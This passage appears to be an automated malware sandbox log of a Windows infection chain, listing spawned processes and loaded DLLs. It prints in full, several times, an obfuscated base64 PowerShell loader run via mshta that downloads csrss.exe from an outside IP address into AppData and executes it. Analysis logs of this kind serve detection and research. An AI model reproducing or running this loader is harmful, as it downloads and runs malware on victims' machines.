iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))"
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.cmdline"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F1A.tmp" "c:\Users\user\AppData\Local\Temp\z0uhqkog\CSCA33479D5CCDF488DBD48FF689C9305B.TMP"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\csrss.exe "C:\Users\user\AppData\Roaming\csrss.exe"
                        Source: C:\Users\user\AppData\Roaming\csrss.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\\ProgramData\\7591.cmd
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\csrss.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\\ProgramData\\37991.cmd
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Roaming\csrss.exeProcess created: C:\Users\user\Links\iaoqralA.pif C:\\Users\\user\\Links\iaoqralA.pif
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"
                        Source: C:\Windows\SysWOW64\systeminfo.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POwershELl.ExE -EX BypasS -nOp -W 1 -c DEVICeCrEDEnTIALdEPLoyMeNT.Exe ; iex($(iEX('[SyStem.tExt.ENCOdInG]'+[ChAR]0X3A+[ChAR]58+'Utf8.getsTRing([sYsTEm.CONveRt]'+[chAR]58+[cHaR]58+'FROmbasE64string('+[Char]34+'JGMxS3luICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkRC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTWJlcmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERock8sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeGpiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFIsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHR1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJnaVNLZHFIUUUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJZT2giICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUVzcGFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHhaUFogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGMxS3luOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjYuMTQzLzQ3MC9jc3Jzcy5leGUiLCIkRW52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO1N0YVJULXNsZWVQKDMpO2luVk9LRS1JdEVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTnY6QVBQREFUQVxjc3Jzcy5leGUi'+[cHaR]0x22+'))')))"Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\z0uhqkog\z0uhqkog.cmdline"Jump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\csrss.exe "C:\Users\user\AppData\Roaming\csrss.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F1A.tmp" "c:\Users\user\AppData\Local\Temp\z0uhqkog\CSCA33479D5CCDF488DBD48FF689C9305B.TMP"Jump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\\ProgramData\\7591.cmdJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\\ProgramData\\37991.cmdJump to behavior
                        Source: C:\Users\user\AppData\Roaming\csrss.exeProcess created: C:\Users\user\Links\iaoqralA.pif C:\\Users\\user\\Links\iaoqralA.pifJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 10Jump to behavior
                        Source: C:\Program Files (x86)\iiJZbacQmSZDFoBWNIdigHSjJguyOKZMdgAiMTRstzrzodtaajzFnQfuCoVTBgFfPoZoM\4nHrKBXqqqVJFZFp.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\systeminfo.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
